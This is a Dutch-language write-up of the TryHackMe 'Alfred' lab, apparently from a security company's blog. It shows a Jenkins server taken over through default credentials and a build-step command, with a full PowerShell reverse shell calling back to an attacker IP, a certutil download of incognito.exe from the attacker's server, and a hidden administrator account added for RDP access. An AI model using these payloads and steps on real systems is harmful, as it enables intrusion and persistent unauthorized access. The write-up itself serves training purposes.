Alfred – TryHackMe – Handmatig schrijven

Reading Time: ( Word Count: )

February 22, 2021
Nextdoorsec-course

Intro

We maken gebruik van een veelvoorkomende misconfiguratie op een veelgebruikte automatiseringsserver (Jenkins) en krijgen toegang via windows tokens.

 

Opsomming

 

Nmap scan

┌(kali㉿kali)-[~] └─$ export IP=10.10.117.45 ┌(kali㉿kali)-[~] └─$ nmap -p- -A -Pn -v $IP
PORT STATE SERVICE VERSIE 80/tcp open http Microsoft IIS httpd 7.5 | http-methodes: | Ondersteunde methoden: OPTIONS TRACE GET HEAD POST |Potentieel riskante methoden: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site heeft geen titel (text/html). 3389/tcp open tcpwrapped | ssl-cert: Onderwerp: commonName=alfred | Afzender: commonName=alfred | Type openbare sleutel: rsa | Openbare sleutel bits: 2048 | Handtekeningalgoritme: sha1metRSAEncryptie | Niet geldig voor: 2020-10-02T14:42:05 | Niet geldig na: 2021-04-03T14:42:05 | MD5: fdb2 cd17 fad1 160d 06bc c1d8 31f3 7636 |_SHA-1: 6577 409f 2b1a 3e36 7ca7 4449 57f2 98c1 8750 3a3e |_ssl-date: 2021-02-06T18:18:26+00:00; -1s van scantijd. 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-favicon: Onbekend favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 | http-robots.txt: 1 afgekeurde vermelding |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site heeft geen titel (text/html;charset=utf-8).

Niets interessants op poort 80, een open RDP poort op 3389 en een andere http webserver op poort 8080 met een inlogformulier. Proberen in te loggen met admin:admin lukt.

Exploitatie

Executie van code op afstand

Na controle van het gereedschap vond ik een manier om commando’s uit te voeren op het onderliggende systeem:

1. Klik op “project” op de startpagina:

 

2. “Configuratie” aan de linkerkant:

 

2.1 Configureer je reverse shell script, start een listener & http server:

┌(kali㉿kali)-[~] └─$ cat revsh.ps1 $client = New-Object System.Net.Sockets.TCPClient('10.8.152.223',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text .encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close(); ┌──(kali㉿kali)-[~] └─$ sudo nc -nlvp 443 ┌──(kali㉿kali)-[~] └─$ python3 -m http.server 5300

 

3. Scroll naar beneden en voer uw opdracht in het veld “Opdracht” in & Sla op:

 

4. Nadat u op “Build” hebt geklikt, zou u een reverse shell moeten krijgen:

luisterend naar [any] 443 ... maak verbinding met [10 .8.152.221] vanaf (UNKNOWN) [10 .10.117.45] 50077 PS C:\Program Files (x86)\Jenkins\workspace\project> whoami alfred\bruce PS C:\Program Files (x86)\Jenkins\workspace\project>

Privilege-escalatie

PS > whoami /priv
PRIVILEGES INFORMATIE ---------------------- Privilege Naam Beschrijving Staat =============================== ========================================= ======== SeDebugPrivilege Debug-programma's ingeschakeld SeImpersonatePrivilege Een client imiteren na authenticatie Ingeschakeld SeCreateGlobalPrivilege Globale objecten aanmaken Ingeschakeld

SeDebugPrivilege & SeCreateGlobalPrivilege zijn ingeschakeld voor Bruce. Met deze tokens kunnen we ons voordoen als een andere gebruiker of er zelfs een aanmaken en hem administratieve rechten geven.

 

We moeten een binair bestand genaamd incognito.exe downloaden om dit te laten werken. We kunnen het daarna overbrengen vanaf een lokale http-server.

┌──(kali㉿kali)-[~] └─$ python3 -m http.server 5300
PS > certutil.exe -urlcache -split -f "http://10.8.152.221:5300/incognito.exe" incognito.exe

Nu we het binaire bestand naar de doelmachine hebben gedownload, kunnen we het gebruiken om een gebruiker toe te voegen.

PS > ./incognito.exe add_user nextdoorsec passwordd
PS > ./incognito.exe add_localgroup_user Administrators nextdoorsec ┌──(kali㉿kali)-[~] └─$ rdesktop -u nextdoorsec -p passwordd $IP

We hebben een gebruiker genaamd “nextdoorsec” toegevoegd met een wachtwoord “passwordd” en daarna toegewezen aan de groep “Administrators”. Om het te testen kunt u verbinding maken met de open RDP-poort.

Aydan Arabadzha

Aydan Arabadzha

Author

Aydan, a cybersecurity ace and AI visionary, thrives on the frontlines of offensive security. His passion birthed NextdoorSec, a groundbreaking cybersecurity firm. A relentless pioneer, Aydan is persistently pushing boundaries, shaping the future of the digital world one byte at a time.

Other interesting articles

Automated vs Manual Penetration Testing

Automated vs Manual Penetration Testing

Pentesting is largely divided into two methodologies: Automated vs Manual Penetration Testing. Both have ...
8 Steps in Penetration Testing You Should Know

8 Steps in Penetration Testing You Should Know

Mastering the art of penetration testing has become a critical ability for security experts to combat cyber ...
Spear Phishing vs Whaling: What is the Difference

Spear Phishing vs Whaling: What is the Difference

Spear phishing is a particularly devious type of phishing assault in which the individual targeted plays a ...
How Often Should Penetration Testing Be Done

How Often Should Penetration Testing Be Done

Penetration testing is a crucial technique that involves simulating a cyberattack on networks, computer systems, ...
0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *